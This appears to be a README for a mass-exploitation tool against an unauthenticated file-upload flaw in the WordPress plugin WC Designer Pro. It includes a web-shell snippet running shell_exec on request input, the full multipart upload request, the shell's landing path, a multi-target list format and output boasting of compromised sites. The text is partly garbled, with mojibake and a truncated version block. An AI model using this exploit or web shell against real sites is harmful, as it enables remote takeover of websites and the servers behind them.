Share
## https://sploitus.com/exploit?id=93509C82-B3B5-511B-88DD-5E37F231D631
# ๐ WC Designer Pro - RCE Exploit
### Unauthenticated Remote Code Execution via Arbitrary File Upload



---
---
## ๐ Table of Contents
- [About the Vulnerability](#-about-the-vulnerability)
- [Affected Versions](#-affected-versions)
- [How It Works](#-how-it-works)
- [Installation](#-installation)
- [Usage](#-usage)
- [Technical Details](#-technical-details)
- [Credits](#-credits)
---
## ๐ฏ About the Vulnerability
The **WC Designer Pro** plugin for WordPress contains a critical **Arbitrary File Upload** vulnerability that allows an **unauthenticated** attacker to upload malicious PHP files, resulting in **Remote Code Execution (RCE)**.
### Summary
| Field | Value |
|-------|-------|
| **Plugin** | WC Designer Pro |
| **Type** | Unauthenticated Arbitrary File Upload |
| **Impact** | Remote Code Execution (RCE) |
| **CVSS Score** | 9.8 (Critical) |
| **Authentication** | Not required |
| **Complexity** | Low |
---
## ๐ด Affected Versions
```
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ WC Designer Pro =2.28.0
urllib3>=1.26.0
rich>=13.0.0
```
---
## ๐ Usage
### Basic Mode
```bash
python3 exploit.py
```
### Target File (list.txt)
```
https://site1.com
https://site2.com
http://site3.com
site4.com
```
### Shell Example (shell.php)
```php
" . shell_exec($_REQUEST['cmd']) . "";
}
?>
```
---
### Saved Results
```
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ โ
EXPLOIT COMPLETED! โ
โ โ
โ ๐ Total Targets: 150 โ
โ ๐ฏ Successfully Exploited: 23 โ
โ โ Failed: 127 โ
โ ๐พ Results saved to: success_results.txt โ
โ ๐ Shells list: uploaded_shells.txt โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
```
---
## ๐ฌ Technical Details
### Vulnerable Endpoint
```http
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: target.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
------WebKitFormBoundary
Content-Disposition: form-data; name="action"
wcdp_save_canvas_design_ajax
------WebKitFormBoundary
Content-Disposition: form-data; name="params"
{"mode":"save","editor":"frontend","uniq":"darkarch","files":[{"name":"darkarch","ext":"php","count":"file1"}]}
------WebKitFormBoundary
Content-Disposition: form-data; name="file1"; filename="shell.php"
Content-Type: application/x-php
------WebKitFormBoundary--
```
### Vulnerable Response
```json
{
"userID": false,
"filesCMYK": [],
"success": true
}
```
### Shell Path
```
/wp-content/uploads/wcdp-uploads/temp/{uniq}/{filename}.php
```
### Detection Methods
| Method | Endpoint/Path | Indicator |
|--------|---------------|-----------|
| **AJAX Check** | `/wp-admin/admin-ajax.php` | `{"userID":false,"filesCMYK":[],"success":0}` |
| **CSS Check** | `/wp-content/plugins/wc-designer-pro/assets/css/wcdp-design.min.css` | HTTP 200 |
---
## ๐ Scan Statistics
```
Tested Targets: โโโโโโโโโโโโโโโโโโโโ 100%
Vulnerable: โโโโโโโโโโโโโโโโโโโโ 15%
Not Vulnerable: โโโโโโโโโโโโโโโโโโโโ 80%
Errors: โโโโโโโโโโโโโโโโโโโโ 5%
```
---
---
## ๐ References
- [WordPress Plugin Security](https://developer.wordpress.org/plugins/security/)
- [OWASP File Upload](https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload)
- [CWE-434: Unrestricted Upload](https://cwe.mitre.org/data/definitions/434.html)
---
## ๐ค Credits
M2hcs
Security Researcher
@m2hcz
---
## ๐ Changelog
### v1.0.0 (2025)
- โ
Initial release
- โ
Multi-threading support
- โ
Detection via AJAX and CSS
- โ
Rich interface with progress bar
- โ
Automatic results saving
---
## โญ Star History
If this project was helpful to you, please consider giving it a โญ!
---
**Made with โค๏ธ for the Security Community**

```
---